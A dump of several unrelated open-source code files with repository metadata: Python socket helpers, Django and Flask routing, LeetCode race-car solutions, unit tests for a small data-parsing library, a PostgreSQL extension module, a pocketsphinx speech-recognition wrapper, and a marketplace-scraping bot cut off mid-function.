Module for socket functions that are shared between the client and server
Author - Ben Cleveland
'''
import socket
HEADER_LENGTH = 16
def create_listen_socket(host, port):
'''
Creates a listen socket on the given hostname and port
returns the created socket
'''
# create the socket
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
# bind to the port
sock.bind((host,port))
sock.listen(5)
# return the created socket
return sock
def create_connection(host, port):
'''
Creates a client socket connection to the given hostname and port
Returns the created socket
'''
sock = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host,port))
return sock
def send_number( conn, num ):
'''
sends a given number of the socket connection
'''
# figure out the header size
header_size = '%016d' % len(str(num))
# send the header
conn.send(header_size)
# send the number
conn.send(str(num))
def send_exit( conn ):
'''
Client sends this message (header size of -1) to the server telling it the client is done
'''
header_size = '%016d' % -1
conn.send(header_size)
def recv_header( conn ):
'''
Recieves the message header from the socket
'''
status = 0
msg_length = read_socket( conn, HEADER_LENGTH)
if len(msg_length) != HEADER_LENGTH:
# error
print 'Invalid message header length(', len(msg_length), '), closing connection...'
status = -1
return (status, msg_length )
def recv_number( conn, size ):
'''
Recieves the number from the socket
'''
status = 0
# recv the number
number = read_socket( conn, size )
if len(number) != size:
# error
print 'Invalid number length', len(number), ', expected size', size, 'closing connection...'
status = -1
# try to convert the number to a float
try:
float(number)
except:
print 'Unable to convert number', number, 'closing connection...'
status = -1
return (status, number)
def read_socket( conn, size ):
'''
This function reads the given size from the socket and returns the data
'''
data = ''
while size > 0:
try:
data += conn.recv( size )
except:
data = ''
break
if( len(data) > 0 ):
size -= len(data)
else: # make sure the thread doesn't hang forever
break
return data
if __name__ == '__main__':
print 'This module cannot be executed directly, exiting'
| UTF-8 | Python | false | false | 2,682 | py | 14 | libsocket.py | 10 | 0.591723 | 0.585011 | 0 | 119 | 21.537815 | 104 |
hiddenman/voip_utils | 12,189,117,215,408 | 6a14404967f3f34f625b1ec103c9bed5dbd3ae4f | 59558f38a9f05222f441a8ffd702d6e699e30e38 | /urls.py | b3df94e31a33051e441a303c0928f75e89032879 | []
| no_license | https://github.com/hiddenman/voip_utils | 5a92481be3b2951b049cf3d66ff07869af388bb9 | 9047a62233cb6a1526f21555968bee5fd4f6581d | refs/heads/master | 2022-01-18T17:55:06.712536 | 2019-06-01T22:52:23 | 2019-06-01T22:52:23 | 113,439,683 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.conf import settings
from django.conf.urls.defaults import *
from django.contrib import databrowse
from django.contrib.admin.views.decorators import staff_member_required
from rates.models import *
# The next two lines enable the admin and load each admin.py file:
from django.contrib import admin
admin.autodiscover()
databrowse.site.register(Country)
databrowse.site.register(Area)
databrowse.site.register(Operator)
databrowse.site.register(Rate)
databrowse.site.register(Target)
urlpatterns = patterns('',
(r'^$', 'voip_utils.rates.views.reports.redirect_to_admin'),
(r'^admin/rates_by_targets/$', 'voip_utils.rates.views.reports.rates_by_targets'),
(r'^admin/rates/rates_by_targets/$', 'voip_utils.rates.views.reports.rates_by_targets'),
(r'^admin/converter/$', 'voip_utils.rates.views.utilities.converter'),
(r'^admin/rates/converter/$', 'voip_utils.rates.views.utilities.converter'),
(r'^data/(.*)', staff_member_required(databrowse.site.root)),
(r'^admin/', include(admin.site.urls)),
)
| UTF-8 | Python | false | false | 1,145 | py | 50 | urls.py | 16 | 0.675983 | 0.675983 | 0 | 27 | 41.37037 | 108 |
MedIAIA/MedApp | 5,153,960,779,188 | f14a686b37121e4897449d31b9a62428d4a81c74 | e73ee0c73bbbd53db55fe5293e90532f5a82b160 | /digiez_api/views/web.py | 291382249798514c70eff3f0672c2cb55f8e931b | []
| no_license | https://github.com/MedIAIA/MedApp | ec7c81e4dd1661eaa197a9e58d12acfafc62fdc0 | 8dd1df1060cda108a53c534aa32ef81bb7b08168 | refs/heads/master | 2023-03-03T01:23:17.871688 | 2021-02-21T22:03:58 | 2021-02-21T22:03:58 | 341,014,421 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Blueprint, url_for, render_template
web = Blueprint('web', __name__, static_folder='../../front/templates')
@web.route('/')
def home():
return web.send_static_file('index.html')
| UTF-8 | Python | false | false | 205 | py | 30 | web.py | 22 | 0.663415 | 0.663415 | 0 | 9 | 21.666667 | 71 |
DancingOnAir/Leetcode_Python_Solution | 4,827,543,246,238 | 3bd38d5529f50f87620b9d417590088cb278034e | 122d1dae77e7e62d0bcdc42dbdf7d79d96df03ea | /DP/0818_race_car.py | 7bb133ebee76e67be1a2e79f500f46e300e0198f | []
| no_license | https://github.com/DancingOnAir/Leetcode_Python_Solution | fd26e012b90a1dab7afbfd10d2ce6dfffdd62799 | 238c6dcf791987d1070979f8f4dbc5aa6af17eda | refs/heads/master | 2023-04-11T14:58:07.859130 | 2023-04-10T16:05:49 | 2023-04-10T16:05:49 | 283,797,446 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from bisect import bisect_left
from collections import deque
class Solution:
# simple dfs solution
def racecar(self, target: int) -> int:
# initialize as 0 moves, 0 position, +1 velocity
q = deque([(0, 0, 1)])
res = float('inf')
while q:
# (m) moves, (p) position, (v) velocity
m, p, v = q.popleft()
if p == target:
res = min(res, m)
if m >= res:
continue
q.append((m + 1, p + v, 2 * v))
if (p + v > target and v > 0) or (p + v < target and v < 0):
q.append((m + 1, p, -1 * v // abs(v)))
return res
def __init__(self):
self.memo = {0: 0}
# bottom-up dp
# https://leetcode.com/problems/race-car/discuss/227415/Figures-to-make-the-DP-solution-more-straightforward
def racecar3(self, target: int) -> int:
dp = [0] + [0x3f3f3f3f] * target
for i in range(1, target+1):
m, j = 1, 1
while j < i:
p, q = 0, 0
while p < j:
dp[i] = min(dp[i], m + 1 + q + 1 + dp[i - j + p])
q += 1
p = (1 << q) - 1
m += 1
j = (1 << m) - 1
dp[i] = min(dp[i], m + (0 if i == j else 1 + dp[j - i]))
return dp[target]
# bfs
def racecar2(self, target: int) -> int:
if target in self.memo:
return self.memo[target]
n = target.bit_length()
if 2 ** n - 1 == target:
self.memo[target] = n
else:
self.memo[target] = self.racecar(2**n - 1 - target) + n + 1
for m in range(n - 1):
self.memo[target] = min(self.memo[target], self.racecar(target - 2**(n - 1) + 2**m) + n + m + 1)
return self.memo[target]
# bfs solution but failed
# failure testing case, if the input 5, we can reach with only 7 steps: AARARAA
def racecar1(self, target: int) -> int:
if not target:
return 0
memo = dict()
def min_steps(target):
if target in memo:
return memo[target]
arr = sorted(memo.keys())
pos = bisect_left(arr, target)
positive_diff = target - arr[pos - 1]
negative_diff = arr[pos] - target
step = min(memo[arr[pos - 1]] + min_steps(positive_diff) + 2, memo[arr[pos]] + min_steps(negative_diff) + 1)
memo[target] = step
return step
total, i, step = 0, 1, 0
while total < target:
total += i
i *= 2
step += 1
memo[total] = step
if target == total:
return step
return min(step + min_steps(total - target) + 1, step - 1 + min_steps(target - (total - i // 2)) + 2)
def test_race_car():
solution = Solution()
assert solution.racecar(3) == 2, 'wrong result'
assert solution.racecar(6) == 5, 'wrong result'
if __name__ == '__main__':
test_race_car()
| UTF-8 | Python | false | false | 3,066 | py | 798 | 0818_race_car.py | 793 | 0.469341 | 0.444879 | 0 | 100 | 29.66 | 120 |
Talos-Laboratories/caramel | 7,687,991,486,600 | 1907c52b69bb62b097955ed064b59874853925e1 | e82d4b791fd21d7057944bcf9440401198008c27 | /caramel_test_suite.py | 7f4cc5fbfc196ffbf6c9c1de1aaf0b01f020edd4 | [
"MIT"
]
| permissive | https://github.com/Talos-Laboratories/caramel | e21e788be22c50789253b7ece42ff66af7016692 | 77464c68077fe0c646f71b30ea3c6da0ae2c2ef9 | refs/heads/master | 2016-09-13T18:05:23.213812 | 2016-05-16T04:50:00 | 2016-05-16T04:50:00 | 58,902,829 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from os import remove
import unittest
from caramel import Caramel
from caramel import DataConverterFactory
from caramel import DataFromList
from caramel import DataFromText
from caramel import DataFromFile
class CaramelTestSuite(unittest.TestCase):
def setUp(self):
self.sut = Caramel()
self.test_list = [['Key_col', 'Field_1', 'Field_2'],
['key_1', 'val_1_1', 'val_1_2'],
['key_2', 'val_2_1', 'val_2_2']]
self.test_text = ('Key_col, Field_1, Field_2\n'
'key_1, val_1_1, val_1_2\n'
'key_2, val_2_1, val_2_2')
self.test_file = 'caramel_test_file.txt'
self.helper_create_file(self.test_file, self.test_text)
def tearDown(self):
self.helper_remove_file(self.test_file)
@staticmethod
def helper_create_file(file_name, file_contents):
with open(file_name, 'w') as new_file:
new_file.write(file_contents)
@staticmethod
def helper_remove_file(file_name):
remove(file_name)
def test_data_from_list_first_value(self):
data_set = self.sut(self.test_list)
test_value = data_set['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_data_from_list_last_value(self):
data_set = self.sut(self.test_list)
test_value = data_set['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
def test_data_from_text_first_value(self):
data_set = self.sut(self.test_text)
test_value = data_set['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_data_from_text_last_value(self):
data_set = self.sut(self.test_text)
test_value = data_set['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
def test_data_from_file_first_value(self):
data_set = self.sut(self.test_file)
test_value = data_set['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_data_from_file_last_value(self):
data_set = self.sut(self.test_file)
test_value = data_set['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
class DataConverterFactoryTestSuite(unittest.TestCase):
def setUp(self):
self.sut = DataConverterFactory()
@staticmethod
def helper_create_file(file_name):
with open(file_name, 'w') as new_file:
new_file.write('Test File')
@staticmethod
def helper_remove_file(file_name):
remove(file_name)
def test_is_list_true(self):
sample = ['value_1', 'value_2']
test_value = self.sut._is_list(sample)
self.assertTrue(test_value)
def test_is_list_false(self):
sample = "value_1, value_2"
test_value = self.sut._is_list(sample)
self.assertFalse(test_value)
def test_is_file_true(self):
sample = 'test_file.txt'
self.helper_create_file(sample)
test_value = self.sut._is_file(sample)
self.assertTrue(test_value)
self.helper_remove_file(sample)
def test_is_file_false(self):
sample = 'test_file_2.txt'
test_value = self.sut._is_file(sample)
self.assertFalse(test_value)
def test_is_list_path(self):
sample = ['value_1', 'value_2']
test_object = self.sut(sample)
test_value = isinstance(test_object, DataFromList)
self.assertTrue(test_value)
def test_is_file_path(self):
sample = 'test_file_data_1.txt'
self.helper_create_file(sample)
test_object = self.sut(sample)
test_value = isinstance(test_object, DataFromFile)
self.assertTrue(test_value)
self.helper_remove_file(sample)
def test_is_text_path(self):
sample = 'Here is just some random text'
test_object = self.sut(sample)
test_value = isinstance(test_object, DataFromText)
self.assertTrue(test_value)
class DataFromListTestSuite(unittest.TestCase):
def setUp(self):
data_list = [['Key', 'Field_1', 'Field_2'],
['key_1', 'val_1_1', 'val_1_2'],
['key_2', 'val_2_1', 'val_2_2']]
self.sut = DataFromList(data_list)
def test_set_headers(self):
self.sut._set_headers()
validation_headers = ['Key', 'Field_1', 'Field_2']
test_headers = self.sut.headers
self.assertEqual(test_headers, validation_headers)
def test_read_all_table_rows_except_headers_first_value(self):
self.sut._set_headers()
self.sut._read_all_table_rows_except_headers()
test_value = self.sut.data_dictionary['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_read_all_table_rows_except_headers_last_value(self):
self.sut._set_headers()
self.sut._read_all_table_rows_except_headers()
test_value = self.sut.data_dictionary['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
def test_read_all_column_values_except_the_keys(self):
self.sut._set_headers()
validation_value = {'key_1':
{'Field_2': 'val_1_2',
'Field_1': 'val_1_1'}}
self.sut._read_all_column_values_except_the_keys(row=1)
test_value = self.sut.data_dictionary
self.assertEqual(test_value, validation_value)
def test_return_data_first_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_return_headers_last_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
class DataFromTextTestSuite(unittest.TestCase):
def setUp(self):
text = ("Key, Field_1, Field_2\n"
"key_1, val_1_1, val_1_2\n"
"key_2, val_2_1, val_2_2\n")
self.sut = DataFromText(text)
def test_clean_value_in_line(self):
test_value = self.sut._clean_value_in_line(' Dirty ')
validation_value = 'Dirty'
self.assertEqual(test_value, validation_value)
def test_clean_line(self):
dirty_line = [' 1', ' 2 ', ' 3', '4', ' 5']
self.sut._clean_line(dirty_line)
test_list = self.sut.data_list
validation_list = [['1', '2', '3', '4', '5']]
self.assertEqual(test_list, validation_list)
def test_split_each_line(self):
dirty_lines = [' 1, 2 , 3 ,4, 5',
' a, b , c ,d, e']
self.sut._split_each_line(dirty_lines)
test_list = self.sut.data_list
validation_list = [['1', '2', '3', '4', '5'],
['a', 'b', 'c', 'd', 'e']]
self.assertEqual(test_list, validation_list)
def test_return_data_first_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_return_headers_last_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
class DataFromFileTestSuite(unittest.TestCase):
def setUp(self):
self.file_name = 'test_data_from_file.txt'
self.helper_create_file()
self.sut = DataFromFile(self.file_name)
def helper_create_file(self):
text = ("Key, Field_1, Field_2\n"
"key_1, val_1_1, val_1_2\n"
"key_2, val_2_1, val_2_2\n")
with open(self.file_name, 'w') as new_file:
new_file.write(text)
def helper_remove_test_file(self):
remove(self.file_name)
def test_return_data_first_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_1']['Field_1']
validation_value = 'val_1_1'
self.assertEqual(test_value, validation_value)
def test_return_headers_last_value(self):
test_dict = self.sut.return_data_set()
test_value = test_dict['key_2']['Field_2']
validation_value = 'val_2_2'
self.assertEqual(test_value, validation_value)
self.helper_remove_test_file()
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 8,874 | py | 3 | caramel_test_suite.py | 2 | 0.590376 | 0.573022 | 0 | 250 | 34.496 | 66 |
perseas/Pyrseas | 7,078,106,141,582 | ec4feb2d3729fd79b141a0f5631351cc6a5f74ba | 851c22930898a3050e0881b9e9b9705d1e22849e | /pyrseas/dbobject/extension.py | 8c4733f77d032e431ec3add9e30122eb6cb7ce76 | [
"BSD-3-Clause"
]
| permissive | https://github.com/perseas/Pyrseas | d54d71c3aafe70f65e38d9c568cfcd3ee9346b0b | ec682513d5256e383647f38f7fba29530cfb9fbe | refs/heads/master | 2023-07-06T01:51:37.469775 | 2023-07-05T15:38:22 | 2023-07-05T15:43:08 | 1,546,410 | 323 | 61 | BSD-3-Clause | false | 2023-04-27T18:58:06 | 2011-03-30T14:23:28 | 2023-04-27T00:36:44 | 2023-04-27T18:58:05 | 3,196 | 362 | 62 | 45 | Python | false | false | # -*- coding: utf-8 -*-
"""
pyrseas.dbobject.extension
~~~~~~~~~~~~~~~~~~~~~~~~~~
This module defines two classes: Extension derived from DbObject,
and ExtensionDict derived from DbObjectDict.
"""
from . import DbObjectDict, DbObject
from . import quote_id, commentable
class Extension(DbObject):
"""An extension"""
keylist = ['name']
single_extern_file = True
catalog = 'pg_extension'
def __init__(self, name, description, owner, schema, version=None,
oid=None):
"""Initialize the extension
:param name: extension name (from extlname)
:param description: comment text (from obj_description())
:param schema: schema name (from extnamespace)
:param owner: owner name (from rolname via extowner)
:param version: version name (from extversion)
"""
super(Extension, self).__init__(name, description)
self._init_own_privs(owner, [])
self.schema = schema
self.version = version
self.oid = oid
@staticmethod
def query(dbversion=None):
return """
SELECT e.extname AS name, n.nspname AS schema, e.extversion AS version,
r.rolname AS owner,
obj_description(e.oid, 'pg_extension') AS description, e.oid
FROM pg_extension e
JOIN pg_roles r ON (r.oid = e.extowner)
JOIN pg_namespace n ON (e.extnamespace = n.oid)
WHERE n.nspname != 'information_schema'
ORDER BY e.extname"""
@staticmethod
def from_map(name, inobj):
"""Initialize an Extension instance from a YAML map
:param name: extension name
:param inobj: YAML map of the extension
:return: extension instance
"""
return Extension(
name, inobj.pop('description', None), inobj.pop('owner', None),
inobj.get('schema'), inobj.pop('version', None))
def get_implied_deps(self, db):
"""Return the implied dependencies of the object
:param db: the database where this object exists
:return: set of `DbObject`
"""
deps = super(Extension, self).get_implied_deps(db)
if self.schema is not None:
s = db.schemas.get(self.schema)
if s:
deps.add(s)
return deps
@commentable
def create(self, dbversion=None):
"""Return SQL statements to CREATE the extension
:return: SQL statements
"""
opt_clauses = []
if self.schema is not None and self.schema not in (
'pg_catalog', 'public'):
opt_clauses.append("SCHEMA %s" % quote_id(self.schema))
if self.version is not None:
opt_clauses.append("VERSION '%s'" % self.version)
return ["CREATE EXTENSION %s%s" % (
quote_id(self.name), ('\n ' + '\n '.join(opt_clauses))
if opt_clauses else '')]
def alter(self, inobj, no_owner=True):
"""Generate SQL to transform an existing extension
:param inobj: a YAML map defining the new extension
:return: list of SQL statements
This exists because ALTER EXTENSION does not permit altering
the owner.
"""
return super(Extension, self).alter(inobj, no_owner=no_owner)
CORE_LANGS = [
"plpgsql",
"pltcl",
"pltclu",
"plperl",
"plperlu",
"plpythonu",
"plpython2u",
"plpython3u"]
class ExtensionDict(DbObjectDict):
"The collection of extensions in a database"
cls = Extension
def _from_catalog(self):
"""Initialize the dictionary of extensions by querying the catalogs"""
for obj in self.fetch():
self[obj.key()] = obj
self.by_oid[obj.oid] = obj
def from_map(self, inexts, newdb):
"""Initialize the dictionary of extensions by converting the input map
:param inexts: YAML map defining the extensions
:param newdb: dictionary of input database
"""
for key in inexts:
if not key.startswith('extension '):
raise KeyError("Unrecognized object type: %s" % key)
name = key[10:]
inobj = inexts[key]
self[name] = Extension.from_map(name, inobj)
if self[name].name in CORE_LANGS:
lang = {'language %s' % self[name].name: {
'_ext': 'e', 'owner': self[name].owner}}
newdb.languages.from_map(lang)
| UTF-8 | Python | false | false | 4,528 | py | 132 | extension.py | 83 | 0.576634 | 0.57553 | 0 | 137 | 32.051095 | 83 |
Moeinh77/pyERA | 10,136,122,829,274 | 60e443d44f6a37bb825a70142a66a500db3a9235 | e300c72f9641743ca610703b5fec141b978374da | /examples/ex_icub_trust_cognitive_architecture/speech_recognition.py | 2948b407d83f2244d3fd900ca57017d548e845ff | [
"MIT"
]
| permissive | https://github.com/Moeinh77/pyERA | 7db4403081944417f1f1f487be5b808b0c87b9d2 | 9597fb0b234e6ad212f768b0bc47bb84ba4bd50e | refs/heads/master | 2020-05-31T09:56:00.917967 | 2019-04-22T13:10:49 | 2019-04-22T13:10:49 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
# The MIT License (MIT)
#
# Copyright (c) 2017 Massimiliano Patacchiola
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Implementation of pocketsphinx Speech Recognition based on a grammar.
# It requires a dictionary of world and a grammar file. There are also
# methods for audio recording (based on linux arecord) and file format
# conversion (based on linux sox, lame, oggenc)
from pocketsphinx.pocketsphinx import *
from sphinxbase.sphinxbase import *
import os
class SpeechRecognizer:
"""
Spynx is based on some standard file that it is necessary to provide:
1- JSpeech Grammar extension (JSF): platform-independent, vendor-independent textual representation of
grammars for use in speech recognition. Grammars are used by speech recognizers to determine
what the recognizer should listen for, and so describe the utterances a user may say.
JSGF adopts the style and conventions of the Java Programming Language in addition to use of
traditional grammar notations.
Example:
grammar hello;
public <greet> = (good morning | hello) ( bhiksha | evandro | paul | philip | rita | will );
http://cmusphinx.sourceforge.net/doc/sphinx4/edu/cmu/sphinx/jsgf/JSGFGrammar.html
2- A dictionary of allowed words, all the words used in the grammar must be present in this file.
3- The model for the language, the Pocketsphinx default en-us folder is a good choice.
"""
def __init__(self, hmm_path, language_model_path, dictionary_path, grammar_path, rule_name, fsg_name):
"""Initiliase a SpeechDetector object. It requires a grammar in order to work.
@param hmm_path: the hidden markov model path
@param language_model_path: the language model path (.bin)
@param dictionary_path: the path to the dictionary used (.dic)
@param grammar_path: path to the grammar file (.gram)
@param rule_name: the rule to pick up from the grammar file
@param fsg_name: the fsg name (can be something like: mygrammar)
"""
# Create a decoder with certain model
config = Decoder.default_config()
config.set_string('-hmm', hmm_path)
#config.set_string('-lm', path.join(data_path, 'turtle.lm.bin')) #language model
config.set_string('-lm', language_model_path)
config.set_string('-dict', dictionary_path) #dictionary
self.decoder = Decoder(config)
# Switch to JSGF grammar
jsgf = Jsgf(grammar_path)
rule = jsgf.get_rule(rule_name)
fsg = jsgf.build_fsg(rule, self.decoder.get_logmath(), 7.5)
fsg.writefile(fsg_name + '.fsg')
self.decoder.set_fsg(fsg_name, fsg)
self.decoder.set_search(fsg_name)
def record_audio(self, destination_path, seconds=3, extension='ogg', harddev='wav'):
"""Record an audio file for the amount of time specified.
It requires to install the following packages:
oggenc: sudo apt-get install vorbis-tools
lame: sudo apt-get install lame
@param destination_path: the path were the object is saved
@param seconds: time in seconds
@param extension: the extension of the produced file (mp3, ogg, wav)
@param harddev: to see all the microphones on your laptop type "arecord --list-devices"
this parameter must be a string containing 'card,device' returned by the command above.
e.g. card 3: AK5371 [AK5371], device 0: USB Audio [USB Audio]
For this microphone the harddev parameter must be: '3,0'
@return: the path to the file created or an empty string in case of errors
"""
if harddev == '':
if extension == 'mp3':
command = "arecord -f cd -d " + str(seconds) + " -t raw | lame -x -r - " + destination_path
elif extension == 'ogg':
command = "arecord -f cd -d " + str(seconds) + " -t raw | oggenc - -r -o " + destination_path
elif extension == 'wav':
command = "arecord -f cd -d " + str(seconds) + " " + destination_path
else:
if extension == 'mp3':
command = command = "arecord -f cd -D hw:" + str(harddev) + " -d " + str(seconds) + " -t raw | lame -x -r - " + destination_path
elif extension == 'ogg':
command = "arecord -f cd -D hw:" + str(harddev) + " -d " + str(seconds) + " -t raw | oggenc - -r -o " + destination_path
elif extension == 'wav':
command = "arecord -f cd -D hw:" + str(harddev) + " -d " + str(seconds) + " " + destination_path
try:
returned = os.system(command)
except:
print("Exception when executing arecord command to record audio.")
if returned == 0:
return destination_path
else:
print("[SPEECH RECOGNITION][ERROR] problem with arecord command, check if extension and harddev are correct.")
return ''
def convert_to_raw(self, file_name, file_name_raw="./audio.raw", extension='wav'):
""" It uses linux 'sox' to convert an mp3 file to raw file.
It is necessary to convert to raw before passing the file to other methods
@param extension: the extension of the input file (wav, mp3)
@param file_name: The path to the file to convert
@param file_name_raw: The path and file name (.raw) for the file produced
@return: the path to the raw file created
"""
# Before processing audio must be converted to PCM extension. Recommended extension is 16khz 16bit
# little-endian mono. If you are decoding telephone quality audio you can also decode 8khz 16bit
# little-endian mono, but you usually need to reconfigure the decoder to input 8khz audio.
# For example, pocketsphinx has -samprate 8000 #option in configuration.
# E.g. use sox to convert mp3 to raw file: sox input.mp3 output.raw rate 16000
# sox --endian little --bits 16000 member.mp3 member.raw rate 16000 channels 1
if extension == 'mp3':
os.system("sox --endian little --bits 16000 " + file_name + " '" + file_name_raw + "' rate 16000 channels 1")
elif extension == 'wav':
os.system("sox " + file_name + " " + file_name_raw + " rate 16000 channels 1")
return file_name_raw
def return_text_from_audio(self, file_name):
"""Given an audio file in raw extension returns the text.
@param file_name: audio file in .raw extension
@return: the text (string) decoded or an empty string if nothing is found
"""
string_to_return = ""
self.decoder.start_utt()
try:
stream = open(file_name, 'rb')
except IOError:
print("[SPEECH RECOGNITION][ERROR] Could not find the audio file :" + str(file_name))
while True:
buf = stream.read(1024)
if buf:
self.decoder.process_raw(buf, False, False)
else:
break
try:
self.decoder.end_utt()
string_to_return = self.decoder.hyp().hypstr
except:
print("[SPEECH RECOGNITION][ERROR] The audio file does not respect the grammar rules")
return string_to_return
| UTF-8 | Python | false | false | 8,346 | py | 27 | speech_recognition.py | 24 | 0.647017 | 0.637191 | 0 | 160 | 51.1625 | 145 |
Polarts/UEMarketplaceAlertsBot | 9,216,999,834,992 | ce4443548013e3c8d85a483bf9c6e8c78be31c04 | 7d6a9e5dbbecd69c33b2e6c42ce2fd3c5057b715 | /bot/functions.py | c74e53ac8d04c4eb3393ab241e19ef93bed6e20b | [
"MIT"
]
| permissive | https://github.com/Polarts/UEMarketplaceAlertsBot | 2d81f26b4bb3fefc8506a3a49f7b094e397e4532 | 5f32690e64cf8ac582427f99e8669f1e716f818d | refs/heads/main | 2023-08-15T11:21:56.535797 | 2021-09-28T09:43:28 | 2021-09-28T09:43:28 | 405,038,207 | 1 | 0 | MIT | false | 2021-09-24T10:22:37 | 2021-09-10T10:11:59 | 2021-09-23T06:31:46 | 2021-09-24T10:22:37 | 40 | 0 | 0 | 0 | Python | false | false | import functools
import json
import os
from typing import Sequence
import requests
import facebook
from datetime import datetime, timezone
from bs4 import BeautifulSoup
from django.utils import timezone
from .models import AppState, AssetSource, Asset, LogEntry
BASE_URL = 'https://www.unrealengine.com'
def seed_database():
AppState.objects.create(
play_state=AppState.PlayStates.PLAY,
health_state=AppState.HealthStates.PENDING,
last_posted=timezone.now()
)
AssetSource.objects.create(
title='Free Monthly',
type=AssetSource.SourceTypes.SCRAPE,
post_title='New free monthly assets out now:',
url='/marketplace/en-US/assets?tag=4910'
)
AssetSource.objects.create(
title='Megascans',
type=AssetSource.SourceTypes.JSON,
post_title='New free megascans available:',
url='/marketplace/api/assets/seller/Quixel+Megascans?lang=en-US&start=0&count=20&sortBy=effectiveDate&sortDir=DESC&priceRange=[0,0]'
)
def append_log(source, type, text):
LogEntry(
time_stamp=timezone.now(),
source=source,
type=type,
text=text
).save()
status = AppState.objects.get(pk=1)
if type == LogEntry.LogEntryTypes.LOG and status.health_state == 'PEND':
status.health_state = 'GOOD'
if type == LogEntry.LogEntryTypes.ERR:
status.health_state = 'BAD'
status.play_state = 'STOP'
status.save()
def get_new_session():
session = requests.Session()
return session
def get_json_assets(session: requests.Session, source: AssetSource):
if source.is_discontinued: return []
request = session.get(BASE_URL + source.url)
response = json.loads(request.text)
json_assets = None
asset_array = []
try:
source.is_discontinued = response['data']['sellerProfile']['isDiscontinued']
source.save()
if (source.is_discontinued):
append_log(
source='get_json_assets',
type=LogEntry.LogEntryTypes.WARN,
text=f'Asset source {source.title} has been discontinued!'
)
return asset_array
except: pass
try:
json_assets = response['data']['elements']
except KeyError:
append_log(
source='get_json_assets',
type=LogEntry.LogEntryTypes.ERR,
text=f'Failed to parse JSON[data][elements] from {source.title}, raw: {response}'
)
return asset_array
for asset in json_assets:
title = asset['title']
description = functools.reduce(
lambda a, b: { 'desc': a['desc'] + b['name'] },
asset['categories'],
{'desc': ''}
)['desc']
link = BASE_URL +'/marketplace/en-US/product/' + asset['urlSlug']
try:
asset_array.append(Asset(
title=title,
description=description,
link=link,
source=source
))
except TypeError:
append_log(
source='get_json_assets',
type=LogEntry.LogEntryTypes.ERR,
text="An error occured while creating Asset from the following: "+title+", "+link+", "+description
)
return asset_array
def scrape_assets(session: requests.Session, source: AssetSource):
request = session.get(BASE_URL + source.url)
response = BeautifulSoup(request.text, 'lxml')
scraped_assets = response.select('article.asset')
asset_array = []
for asset in scraped_assets:
h3a = asset.select('h3 a')[0]
title = h3a.text
categories = asset.select('.details .categories')
description = ''
for i in range(len(categories)):
cat_item = categories[i].select('.mock-ellipsis-item-cat')
if len(cat_item) > 0:
description += cat_item[0].text + (',' if i < len(categories)-1 else '')
link = BASE_URL + h3a['href']
try:
asset_array.append(Asset(
title=title,
description=description,
link=link,
source=source
))
except TypeError:
append_log(
source='scrape_assets',
type=LogEntry.LogEntryTypes.ERR,
text="An error occured while creating Asset from the following: "+title+", "+link+", "+description
)
return asset_array
def persist_new_assets(assets: Sequence[Asset]):
new_assets = 0
for asset in assets:
try:
existing_asset = Asset.objects.get(title__exact=asset.title)
append_log(
source='persist_new_assets',
type=LogEntry.LogEntryTypes.LOG,
text='Asset already exists: ' + asset.title
)
if not existing_asset.sent:
new_assets += 1
except Asset.DoesNotExist:
asset.time_stamp = timezone.now()
asset.sent = False
asset.save()
append_log(
source='persist_new_assets',
type=LogEntry.LogEntryTypes.LOG,
text='New asset added: ' + asset.title
)
new_assets += 1
return new_assets
def post_new_assets(title, debug=False):
assets = Asset.objects.filter(sent=False)
# prepare message for posting
message = title + '\n\n' \
+ functools.reduce(
lambda a, b: {'message': a['message'] + b.title + '\n[' + b.description + ']\n' + b.link + '\n\n'},
assets,
{'message': ''}
)['message']
if debug:
return message
else:
try:
fb_key = os.environ['FB_API_KEY']
page_id = os.environ['PAGE_ID']
